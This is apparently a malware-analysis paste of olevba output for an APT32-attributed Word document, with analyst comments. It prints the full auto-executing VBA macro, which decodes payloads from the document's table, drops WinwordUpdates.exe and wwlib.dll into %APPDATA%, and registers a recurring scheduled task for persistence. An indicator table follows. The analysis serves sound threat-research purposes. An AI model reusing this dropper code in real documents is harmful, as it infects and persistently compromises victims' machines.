
APT32 docs vba

a guest
Feb 25th, 2019
  1. olevba 0.53.1 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. MHT:MASIHB-- d1901f0b6266e4be23d805daaed7a10e1d0abcc5e30ed7c38803d13b80caf74d.doc
  5. ===============================================================================
  6. FILE: d1901f0b6266e4be23d805daaed7a10e1d0abcc5e30ed7c38803d13b80caf74d.doc
  7. Type: MHTML
  8. -------------------------------------------------------------------------------
  9. VBA MACRO ThisDocument.cls
  10. in file: None - OLE stream: u'VBA/ThisDocument'
  11. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  12. Private Sub Document_Open()  // auto-exec entry point (olevba: AutoExec): on document open, decodes two payloads from the document's first table, writes them to %APPDATA%, then registers a scheduled task
  13.     Dim sAppData As String  // declare variables
  14.     sAppData = Environ("APPDATA")   // get environment variable https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/environ-function
  15.     sAppData = sAppData & "\WinwordUpdates.exe"  // drop path 1: %APPDATA%\WinwordUpdates.exe
  16.     Dim sAppData1 As String
  17.     sAppData1 = Environ("APPDATA"  // NOTE(review): closing parenthesis is missing in this listing - probably a transcription slip; same lookup as for sAppData above
  18.     sAppData1 = sAppData1 & "\wwlib.dll"  // drop path 2: %APPDATA%\wwlib.dll
  19.    
  20.     Dim b As String
  21.     Dim a As String
  22.     Dim tableNew As Table   // Table object type https://docs.microsoft.com/en-us/office/vba/api/word.table
  23.     Set tableNew = ActiveDocument.Tables(1) // first table of the active document; its cells hold the Base64-encoded payloads https://docs.microsoft.com/en-us/office/vba/api/word.table
  24.     a = tableNew.Cell(1, 1).Range.Text  // cell at (row 1, column 1): encoded text of the first payload
  25.     a = Left(a, Len(a) - 2) // drop the last 2 characters - presumably Word's end-of-cell marker; verify against the document
  26.     b = Base64Decode(a) // decode with the macro's own Base64Decode (defined below)
  27.     Dim fso As Object   // like Object in java (object-oriented) https://docs.microsoft.com/en-us/office/vba/language/concepts/getting-started/creating-object-variables
  28.     Set fso = CreateObject("Scripting.FileSystemObject") // File system object  https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/filesystemobject-object
  29.     Dim oFile As Object
  30.     Set oFile = fso.CreateTextFile(sAppData)     // create the file and get a handle to the stream https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/textstream-object
  31.     oFile.Write b  // the decoded payload is written through a text stream, not a binary API
  32.     oFile.Close         // drop WinwordUpdates.exe to %APPDATA%\WinwordUpdates.exe
  33.    
  34.     Dim c As String   // second payload: same steps, reading cell (1, 2)
  35.     Dim d As String
  36.     c = tableNew.Cell(1, 2).Range.Text
  37.     c = Left(c, Len(c) - 2)
  38.     d = Base64Decode(c)
  39.     Dim fso1 As Object
  40.     Set fso1 = CreateObject("Scripting.FileSystemObject")
  41.     Dim oFile1 As Object
  42.     Set oFile1 = fso1.CreateTextFile(sAppData1)
  43.     oFile1.Write d
  44.     oFile1.Close // drop wwlib.dll to %APPDATA%\wwlib.dll (sAppData1), next to WinwordUpdates.exe; NOTE(review): an EXE dropped beside a DLL named wwlib.dll suggests DLL side-loading - confirm by examining both dropped files
  45.    
  46.     yiBhyERIualWRmBjcsIbCZLq  // call (no arguments) to the obfuscated-name function below, which registers the "WinwordUpdates" scheduled task
  47.     Set fso = Nothing  // set to null https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/nothing-keyword
  48.     Set oFile = Nothing
  49.     Set fso1 = Nothing
  50.     Set oFile1 = Nothing
  51. End Sub
  52.  
  53. Function Base64Decode(ByVal base64String) As String      // hand-rolled Base64 decoder: returns the decoded data as a String, raises error 1 or 2 on malformed input
  54.   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"  // standard Base64 alphabet; a character's position (0-63) is its 6-bit value
  55.   Dim dataLength, sOut, groupBegin
  56.  
  57.   base64String = Replace(base64String, vbCrLf, "")  // strip CR/LF, tabs and spaces before decoding
  58.   base64String = Replace(base64String, vbTab, "")
  59.   base64String = Replace(base64String, " ", "")
  60.  
  61.   dataLength = Len(base64String)
  62.   If dataLength Mod 4 <> 0 Then  // input must consist of whole 4-character groups
  63.     Err.Raise 1, "Base64Decode", "Bad Base64 string."
  64.     Exit Function
  65.   End If
  66.  
  67.   For groupBegin = 1 To dataLength Step 4  // one 4-character group per iteration -> up to 3 output bytes
  68.     Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
  69.     numDataBytes = 3
  70.     nGroup = 0
  71.  
  72.     For CharCounter = 0 To 3
  73.  
  74.       thisChar = Mid(base64String, groupBegin + CharCounter, 1)
  75.  
  76.       If thisChar = "=" Then  // padding: contributes zero bits and shortens this group's output by one byte
  77.         numDataBytes = numDataBytes - 1
  78.         thisData = 0
  79.       Else
  80.         thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1  // case-sensitive alphabet lookup; -1 when the character is not in the alphabet
  81.       End If
  82.       If thisData = -1 Then
  83.         Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
  84.         Exit Function
  85.       End If
  86.  
  87.       nGroup = 64 * nGroup + thisData  // shift in 6 bits; after 4 characters nGroup holds a 24-bit value
  88.     Next
  89.  
  90.     nGroup = Hex(nGroup)  // the 24-bit value is converted to a hex string
  91.  
  92.     nGroup = String(6 - Len(nGroup), "0") & nGroup  // left-pad to 6 hex digits (3 bytes); the next statement turns each 2-digit pair into one character
  93.  
  94.     pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
  95.       Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
  96.       Chr(CByte("&H" & Mid(nGroup, 5, 2)))
  97.    
  98.     sOut = sOut & Left(pOut, numDataBytes)  // keep only the real data bytes of this group (fewer than 3 when padded)
  99.   Next
  100.  
  101.   Base64Decode = sOut  // NOTE(review): the Chr and Hex use here likely accounts for olevba's "Chr" and "Hex Strings" hits - confirm
  102. End Function
  103.  
  104. Function yiBhyERIualWRmBjcsIbCZLq()  // persistence: registers a scheduled task "WinwordUpdates" that runs %APPDATA%\WinwordUpdates.exe; Template Code https://docs.microsoft.com/en-us/windows/desktop/taskschd/daily-trigger-example--scripting-
  105.     Dim sAppData As String
  106.     sAppData = Environ("APPDATA")
  107.     sAppData = sAppData & "\WinwordUpdates.exe"  // same path the EXE was dropped to in Document_Open
  108.     Const TriggerTypeTime = 1  // passed to triggers.Create below
  109.     Const ActionTypeExec = 0  // passed to Actions.Create below
  110.    
  111.     Set service = CreateObject("Schedule.Service")  //  Create the TaskService object
  112.     Call service.Connect
  113.     Dim rootFolder
  114.     Set rootFolder = service.GetFolder("\")  // task is placed in the scheduler's root folder
  115.     Dim taskDefinition
  116.     Set taskDefinition = service.NewTask(0)
  117.     Dim principal   //   security logon method that is required to run the tasks https://docs.microsoft.com/en-us/windows/desktop/taskschd/principal-logontype
  118.     Set principal = taskDefinition.principal
  119.     principal.LogonType = 3 // User must already be logged on. The task will be run only in an existing interactive session
  120.    
  121.     Dim settings    // https://docs.microsoft.com/en-us/windows/desktop/taskschd/taskschedulerschema-settings-tasktype-element
  122.     Set settings = taskDefinition.settings
  123.     settings.Enabled = True
  124.     settings.StartWhenAvailable = True
  125.     settings.Hidden = False  // Hidden is left off, so the task should be visible in the Task Scheduler UI
  126.    
  127.     Dim triggers   // https://docs.microsoft.com/en-us/windows/desktop/taskschd/daily-trigger-example--scripting- ( see 4)
  128.     Set triggers = taskDefinition.triggers  // https://docs.microsoft.com/en-us/windows/desktop/taskschd/taskdefinition-triggers
  129.     Dim trigger
  130.     Set trigger = triggers.Create(TriggerTypeTime)
  131.    
  132.     Dim startTime, endTime
  133.     Dim time
  134.     time = DateAdd("s", 30, Now)  // current time plus 30 seconds
  135.     startTime = XmlTime(time)
  136.     trigger.StartBoundary = startTime // task runs after 30s
  137.     trigger.Enabled = True
  138.     Dim Repetition
  139.     Set Repetition = trigger.Repetition
  140.     Repetition.Interval = "PT" & "5" & "M"  // "PT5M": repeat every 5 minutes; no Duration is set in this code https://docs.microsoft.com/en-us/windows/desktop/taskschd/taskschedulerschema-duration-repetitiontype-element
  141.    
  142.     Dim Action
  143.     Set Action = taskDefinition.Actions.Create(ActionTypeExec)
  144.     Action.Path = sAppData  // the task executes %APPDATA%\WinwordUpdates.exe
  145.     Action.Arguments = ""
  146.     Call rootFolder.RegisterTaskDefinition("WinwordUpdates", taskDefinition, 6, , , 3)  // task name "WinwordUpdates"; flags 6 = create or update, user/password omitted, logon type 3 as above. Hunting: a root-folder task with this name whose action points into %APPDATA% (task creation is logged as Security event 4698 where that auditing is enabled)
  147.    
  148. End Function
  149. Function XmlTime(t)  // format date/time t as "YYYY-MM-DDTHH:MM:SS", the string assigned to the trigger's StartBoundary
  150.     Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
  151.     Dim tTime, tDate
  152.     cSecond = "0" & Second(t)  // prepend "0" to each part; Right(..., 2) below keeps the last two digits, giving zero-padding
  153.     cMinute = "0" & Minute(t)
  154.     CHour = "0" & Hour(t)
  155.     cDay = "0" & Day(t)
  156.     cMonth = "0" & Month(t)
  157.     cYear = Year(t)
  158.     tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _
  159.         ":" & Right(cSecond, 2)
  160.     tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
  161.     XmlTime = tDate & "T" & tTime  // date and time joined with "T"; no time-zone suffix is appended
  162. End Function
  163.  
  164.  
  165.  
  166.  
  167.  
  168.  
  169.  
  170.  
  171.  
  172.  
  173.  
  174.  
  175.  
  176.  
  177.  
  178. +------------+--------------------+-----------------------------------------+
  179. | Type       | Keyword            | Description                             |
  180. +------------+--------------------+-----------------------------------------+
  181. | AutoExec   | Document_Open      | Runs when the Word or Publisher         |
  182. |            |                    | document is opened                      |
  183. | Suspicious | Chr                | May attempt to obfuscate specific       |
  184. |            |                    | strings (use option --deobf to          |
  185. |            |                    | deobfuscate)                            |
  186. | Suspicious | CreateObject       | May create an OLE object                |
  187. | Suspicious | CreateTextFile     | May create a text file                  |
  188. | Suspicious | Environ            | May read system environment variables   |
  189. | Suspicious | Write              | May write to a file (if combined with   |
  190. |            |                    | Open)                                   |
  191. | Suspicious | Hex Strings        | Hex-encoded strings were detected, may  |
  192. |            |                    | be used to obfuscate strings (option    |
  193. |            |                    | --decode to see all)                    |
  194. | Suspicious | Base64 Strings     | Base64-encoded strings were detected,   |
  195. |            |                    | may be used to obfuscate strings        |
  196. |            |                    | (option --decode to see all)            |
  197. | IOC        | WinwordUpdates.exe | Executable file name                    |
  198. | IOC        | wwlib.dll          | Executable file name                    |
  199. +------------+--------------------+-----------------------------------------+